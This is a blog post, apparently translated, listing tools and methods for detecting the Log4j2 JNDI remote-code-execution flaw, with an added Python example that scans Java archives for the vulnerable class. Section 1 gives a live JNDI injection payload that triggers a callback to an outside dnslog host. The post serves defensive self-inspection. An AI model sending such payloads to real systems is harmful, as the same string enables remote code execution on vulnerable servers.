Log4j2 vulnerability detection tool list

2022-06-25 20:19:00 Bypass--

It has been a month since the Log4j2 vulnerability was disclosed, and the serious impact it has caused needs no repeating. As time goes on, new vulnerabilities will keep emerging and old ones will fade away, but this RCE vulnerability in Log4j2 may take years to resolve. For some time to come, therefore, it remains a vulnerability we need to keep our attention on.

This article collects and organizes several vulnerability detection methods and tools that can be used for Log4j2 vulnerability detection and self-inspection.


1、Manual verification with dnslog

First, obtain a subdomain from the dnslog platform, then construct a payload and insert it into the request packet.

${jndi:ldap://bypass.fzuqgl.ceye.io}

Whether the dnslog platform receives a request gives a preliminary indication of whether the target environment is vulnerable.

2、Log4j-scan

A Python script for finding log4j2 vulnerabilities. It supports URL testing, as well as fuzzing of HTTP request headers and POST data parameters.

GitHub project address:

https://github.com/fullhunt/log4j-scan

3、Log4j2 Burp passive scanning plug-in

The plug-in integrates Log4j2 vulnerability detection into Burp, improving security testers' ability to detect the vulnerability.

GitHub project address:

https://github.com/f0ng/log4j2burpscanner

[Screenshot: Log4j2 Burp passive scanning plug-in results]

4、Scanning for the log4j2 vulnerability with AWVS

The latest version of AWVS14 supports Log4j2 vulnerability detection and batch scanning. This vulnerability-scanning workhorse won't let you down; get ready to update your arsenal.

5、Product-grade Log4j2 vulnerability detection tool

This detection tool is based on Tencent Security's binAuditor and supports uploading Jar/Ear/War packages; a one-click upload returns the detection results.

Detection address:

https://bsca.ms.qq.com/

[Screenshot: Jar package detection results]

6、Log4j2 local detection tool

A Log4j2 local detection tool extracted from the Changting (Chaitin) Muyun product. It can quickly discover at-risk log4j2 applications on the current server.

Log4j2 vulnerability detection tool address:

https://log4j2-detector.chaitin.cn/
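
One way a local check of the kind described in sections 5 and 6 can work, as an added example (not code from the Tencent or Chaitin tools, whose internals this page does not describe): walk Jar/War/Ear archives, including nested ones, and report any that bundle log4j-core's JndiLookup class. The function names and the sample archive are constructed for illustration.

```python
import io
import zipfile

# Class that implements the ${jndi:...} lookup inside log4j-core.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped in the log4j-core jar; carries the version string.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def scan_archive(data, name, max_depth=5):
    """Return [(path, version)] for each archive in `data` that bundles JndiLookup."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # corrupt or non-zip content: nothing to report
    with zf:
        names = sorted(zf.namelist())
        if JNDI_CLASS in names:
            version = "unknown"
            if POM_PROPS in names:
                props = zf.read(POM_PROPS).decode("utf-8", "replace")
                for line in props.splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            findings.append((name, version))
        if max_depth > 0:  # depth limit guards against deeply nested archives
            for entry in names:
                if entry.lower().endswith(ARCHIVE_EXT):
                    findings += scan_archive(zf.read(entry), f"{name}!/{entry}", max_depth - 1)
    return findings


def make_zip(entries):
    """Build an in-memory zip from {name: bytes}; used only for the constructed sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry, content in entries.items():
            zf.writestr(entry, content)
    return buf.getvalue()


# Constructed sample: a WAR bundling a fake log4j-core jar and an unrelated jar.
core = make_zip({JNDI_CLASS: b"\xca\xfe\xba\xbe", POM_PROPS: b"version=0.0.0-sample\n"})
other = make_zip({"com/example/App.class": b"\xca\xfe\xba\xbe"})
SAMPLE_WAR = make_zip({"WEB-INF/lib/log4j-core.jar": core, "WEB-INF/lib/app.jar": other})

if __name__ == "__main__":
    for path, version in scan_archive(SAMPLE_WAR, "sample.war"):
        print(f"JndiLookup present: {path} (log4j-core version {version})")
```

A hit means the JNDI lookup class is present, not that the version is unpatched; compare the reported version against Apache's advisory. Shaded jars that relocate the package will not match this path.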

7、360 Log4j2 detection toolkit

Browser passive scanning plus a local detection tool provide a complete Log4j2 vulnerability detection scheme. In addition, the toolkit also includes a Log4j2 patch scheme.

Copyright notice
This article was written by [Bypass--]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/02/202202190501549106.html